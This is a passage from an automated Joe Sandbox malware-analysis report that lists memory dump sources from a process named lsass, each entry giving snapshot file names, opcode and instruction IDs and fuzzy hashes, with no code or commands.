                                                            • Instruction Fuzzy Hash: 9421F920B1C9290FF798A76C94EA6B976C2EB9A351B540079E50EC33D2DDACAC4182C1
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5f67d1b481ceacd871555a3b275c3256700914c0434335d3c87438a0822dbfd
                                                            • Instruction ID: d096ccad5cc86478fd04227944588ddc4db47be91ce7d6d8977c420fe186064d
                                                            • Opcode Fuzzy Hash: e5f67d1b481ceacd871555a3b275c3256700914c0434335d3c87438a0822dbfd
                                                            • Instruction Fuzzy Hash: 2A21B136B0D6899FE712ABA898B10ED7B60EF43320F1442B2D148DB183EE7C654696C1
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff5226bf4294a1d22a55a8f3270c98a1a3cbacbb02a99853db445e50a74f6a20
                                                            • Instruction ID: 070a058f86c4cf41120f687f6f2660eb0b8ac9c1a8ad530618294fb759124851
                                                            • Opcode Fuzzy Hash: ff5226bf4294a1d22a55a8f3270c98a1a3cbacbb02a99853db445e50a74f6a20
                                                            • Instruction Fuzzy Hash: 07115E22E0D6494FD729A76448AB5FA7FA0FF57320F4C01BBE50CC7083D91D68858381
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23629de8a8c303f27782ea4d29641db831251725b0798490bfc3c079720b38e4
                                                            • Instruction ID: fa7d008d02189d185eaf5ea22176c23c86f8b6952f6103e8254e65c9421dffd4
                                                            • Opcode Fuzzy Hash: 23629de8a8c303f27782ea4d29641db831251725b0798490bfc3c079720b38e4
                                                            • Instruction Fuzzy Hash: 65119032F0C91A8FE768EB18C4A26B97391FB56350F084679D44DD72C6CE2C7C819B81
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43866b6c94a3d8e42c7ceb931c0348737b4e93f9e8e61276f13f671354e7e212
                                                            • Instruction ID: 3156e41ba4909368740d6bee8e92eb440faad0ac713325e6336dc9b8cd247d97
                                                            • Opcode Fuzzy Hash: 43866b6c94a3d8e42c7ceb931c0348737b4e93f9e8e61276f13f671354e7e212
                                                            • Instruction Fuzzy Hash: 80119E35B0E68D8EE7139B6888B11AD7BA0EF53310F1545B6C144DB192DE7C660697C1
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c840da4b69f6d5accff70d305ec01792d2597106b418932053a67a69883a648
                                                            • Instruction ID: 8786c4d0a7c54934fabc3884928ba8c8b2579c4af4205a6ecc7f00971f3d5c33
                                                            • Opcode Fuzzy Hash: 9c840da4b69f6d5accff70d305ec01792d2597106b418932053a67a69883a648
                                                            • Instruction Fuzzy Hash: FE110D71B08A09CFDB94DB44C494BAD77F2EB58314F15416AC40ED7290CF79A981DB48
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc90987e7310b98e75f9564d28927b7dec4b0d6eeebd5fc4e2af21546566306e
                                                            • Instruction ID: 712c9a87abc59480b90db644c00259f4adf89bffa35cc7a9c29fdbe9e0f719ee
                                                            • Opcode Fuzzy Hash: cc90987e7310b98e75f9564d28927b7dec4b0d6eeebd5fc4e2af21546566306e
                                                            • Instruction Fuzzy Hash: 33118B35A0E68D8FE713DB6888B10AD7BB0EF53310F1541B6C144DB192DE7CA64AAB81
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ecf3841aa623fa1b35a2eea945f96a19c38413566017df3c343223bca42b29cd
                                                            • Instruction ID: c0f9a6284258d6d90449cdae7da6f3e2ed25fd9b212614c2871a2d786d00d2e9
                                                            • Opcode Fuzzy Hash: ecf3841aa623fa1b35a2eea945f96a19c38413566017df3c343223bca42b29cd
                                                            • Instruction Fuzzy Hash: 52017C34E0E2899FEB12DB6888A409D7FB0EF03300F1441F6D544DB192DE7CAA459781
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b8c5844df8ea381d159120fea82c5e848038404ff143cd81fda6ef7b2b20065f
                                                            • Instruction ID: cd8c31561687749dfeb71958535db18c8a0aae71e62d107a303cf27dbe4cb50d
                                                            • Opcode Fuzzy Hash: b8c5844df8ea381d159120fea82c5e848038404ff143cd81fda6ef7b2b20065f
                                                            • Instruction Fuzzy Hash: 05F05430B1C90B4FF6199B0C99E06B97291EF56710F508172D61FC31D6ED3CED816688
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: edafc2428d5ccee991aa8cb766393cbd882c016104ed16d42629e59fce8562f8
                                                            • Instruction ID: 6fe98d940d13bd9ae512aec80ab750dda71e55776894a947132842e5c6f961db
                                                            • Opcode Fuzzy Hash: edafc2428d5ccee991aa8cb766393cbd882c016104ed16d42629e59fce8562f8
                                                            • Instruction Fuzzy Hash: A5F08131B0840E8BF710DB84C8A49BEB7A1EF51710F00063BC11AD7289CEBC69818680
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: ccede96e88bc7e0a21b6ca1f725839310230ca55dd1c7de19ccbd3975723da9f
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 64F0EC30A1CA1E8EFB55EB40C8E57F87361FB97701F5041B5C60AD72A5DFAC69809A81
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b47bbe3ce6633e90240de428528b7ac5aaf74c28822c1bd52b82399c0ad5532
                                                            • Instruction ID: c13fa1bfb10e7f214b80c502d694a0a2c5ee59307ff9919afa7c0cdb93b14e04
                                                            • Opcode Fuzzy Hash: 1b47bbe3ce6633e90240de428528b7ac5aaf74c28822c1bd52b82399c0ad5532
                                                            • Instruction Fuzzy Hash: C2F02B2175DBC40FC719663954654A17BE1CF9B20574942FFD097C7693DD18EC468341
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 303be9dbd397d72052ab4426d3bdc686c0a49139f0a662adfa975f5fce6681dd
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: BBF05E30B0CA0A4EFB90EB00C8E57F82391FF57700F108175CA4ED72A2DEAC69409AC0
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c5cc8c3c1a3bfa48b94278ab006bbbede4072231905a33c6f186732b74faf9b
                                                            • Instruction ID: 989b8fce73b684103055b26c55621fc25bf41651d12cf89ef1dfb12e57f0f706
                                                            • Opcode Fuzzy Hash: 6c5cc8c3c1a3bfa48b94278ab006bbbede4072231905a33c6f186732b74faf9b
                                                            • Instruction Fuzzy Hash: 25F06D6096D7C44FC302AB388C640247FF0EE5B20578A02EBC0C5CA5B3EA198946C352
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49d8e67cd949d173e3fd3b7862f4b1429d18864530a71535e5ab37102f3f98f2
                                                            • Instruction ID: 9b2d419dad0e0b03a481a11f2af2f04ad6c0e486dd6a37c60adb0af31268653e
                                                            • Opcode Fuzzy Hash: 49d8e67cd949d173e3fd3b7862f4b1429d18864530a71535e5ab37102f3f98f2
                                                            • Instruction Fuzzy Hash: 1CE01220719B884FC70E662C8C695647FB1EFAB61178952DBC045CB6A3ED19DC89C741
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa2a81ab90c76cea9b7e3a81290d88cad7a08fdbb9687a4b825017d060acf1a
                                                            • Instruction ID: 3e29427421c4495a2cbfc7a32c9b7014251b3aa6d64c3563834ae623f6b807fc
                                                            • Opcode Fuzzy Hash: dfa2a81ab90c76cea9b7e3a81290d88cad7a08fdbb9687a4b825017d060acf1a
                                                            • Instruction Fuzzy Hash: 79F01221B199194FEAD4EB5884B5678A2D2FF59300F1405B6D50DD7282CD39BC419B40
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e8679f45554cb8bd0e426df1b9886b9dc8db377811cae7693e09ea5c39d4e2b
                                                            • Instruction ID: d63cf363b2eafce00b12b42001ee354a251c089acef09358249d922c982968db
                                                            • Opcode Fuzzy Hash: 0e8679f45554cb8bd0e426df1b9886b9dc8db377811cae7693e09ea5c39d4e2b
                                                            • Instruction Fuzzy Hash: 08E04F2164A7C44FC70EA7288C695603BB1DE6B21178A40D7C045CB6B3E91ECC49C741
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                            • Instruction ID: 0e1ac431929f476acabd6338b9bf160cda12f825b496f6581b6df297c8901bf1
                                                            • Opcode Fuzzy Hash: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                            • Instruction Fuzzy Hash: F7E0DF01E4E78A0EE60322BD14F60AD7A141F93214F9801B2C64DD60A3BCCE309826A2
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b2d73afd36937a51db99eb8caae32cf883d9b057ab269fef98245fcdbffeb58
                                                            • Instruction ID: 656970dfed9a4d588b913da2e8751fd6ed58901285d9920c190bdbcfc391a764
                                                            • Opcode Fuzzy Hash: 6b2d73afd36937a51db99eb8caae32cf883d9b057ab269fef98245fcdbffeb58
                                                            • Instruction Fuzzy Hash: 25E0862164A7C44FC70EA7788C699503FB1DF6B21178A40DBC045CB6B3E91DCC49C752
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: ad0b291874e62b9b7d13df6e15b7efe3e4b269c6aba3380eaa1ab2a98312651c
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: A9E01260F0D4064AFB94A744D4A17A96255DB4A310F140078DB4ED33C1CD6CAD409B86
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14685c2a076262b805058f1ff0bb1896821295ce047a7273c85fb52a63930c45
                                                            • Instruction ID: fcbe995f45cf3f4f40755ec17933731352bfb013a4ede62fa242e71a8210e5f5
                                                            • Opcode Fuzzy Hash: 14685c2a076262b805058f1ff0bb1896821295ce047a7273c85fb52a63930c45
                                                            • Instruction Fuzzy Hash: B3E01A3194F7C04FC74B973588A88547F61EE1721474A40EAC145CF1A3DA1A8949C701
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9c8b8bf189b189452d69569c7ef9fd885a058188383caafd4e1b9b1143e2f95
                                                            • Instruction ID: eb2a3ab983c84e23d8e464ff0ba941a903abc57a88c6d3c78fa867b806bc547c
                                                            • Opcode Fuzzy Hash: a9c8b8bf189b189452d69569c7ef9fd885a058188383caafd4e1b9b1143e2f95
                                                            • Instruction Fuzzy Hash: 32E0E23195E7C44FC70BAB3488A99503FB0AE2B21178B01CBD045CF5B3EA698C88C762
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: a72dcec10c68db10ea45f213d187928fe39dfa7d4f5fd9b240b871a8dc6b700b
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: B8D0A730218A4E4FD600B738C88A4247BA0FF0F211FD510E1E008C71A2D50848558740
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                            • Instruction ID: e699609c198188c136d0c9e7fc6b140a4b29c04be5d0b62b483b38538d98cef3
                                                            • Opcode Fuzzy Hash: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                            • Instruction Fuzzy Hash: 0DD01234B549044F870CA7399C9987473D1EB6A61679540A9D40BC72B1D96ADCC9C741
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e30a70fdf3be1c2062e9d2c23b2e8354167320d4b8d6ed77101f0ce33f1e901
                                                            • Instruction ID: 08962eaa666a1472b1539e901440cdc9defa26c39a5e404182015b54de2e2b5c
                                                            • Opcode Fuzzy Hash: 0e30a70fdf3be1c2062e9d2c23b2e8354167320d4b8d6ed77101f0ce33f1e901
                                                            • Instruction Fuzzy Hash: FFD01234B509054F871CA73888A987473D1EBAA21679544A9D00AC72B1E96ADC89C741
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 9e861f3e439aaf853c8f11a22adbb079205d10f98cd7a304199f1e10a4677264
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: 60C04C05F5E61F09B815776E58E60ACA1409BD7610FD50172D74DD00D19CCD24D921D6
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: 386651720350b0619f7d7d9a3cfaa5a0b8af7bb539c6fe2dbe72a98b27a909b0
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 7BC04C345518099FC948EB29C89595477A0FB1A315BD50094E409C7171D65AECD5D781
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29b6c8e7a83b95acbc3b1db65da8dc0763b59cff095b481416aa6b3370ee7f49
                                                            • Instruction ID: 559f025f8c902d0494627f3ab13a702a4e5e92ce54ab8853d81f1ed1c6bd25de
                                                            • Opcode Fuzzy Hash: 29b6c8e7a83b95acbc3b1db65da8dc0763b59cff095b481416aa6b3370ee7f49
                                                            • Instruction Fuzzy Hash: 42C08C00F0CC1646F2A4228400312BE04064F88300F944030E10EEB3C6CE6C2D0112C6
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: a84eed44f54335c228166c2b680a71cf7003e3d9a047fb829d510b8d8adaef60
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: 23B01200E5A40F08A404337E08D20A470405B47100FC000B0D60EC00819CCD249422C2
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 46483bb4b5e4ee59b5de81c9b5a2aa8061e20f852aa1730399efe1ce38cac06f
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 90C02B30F0C40C44E734433048520FB32014F47304F0542F1810BFB082CC3C1C003180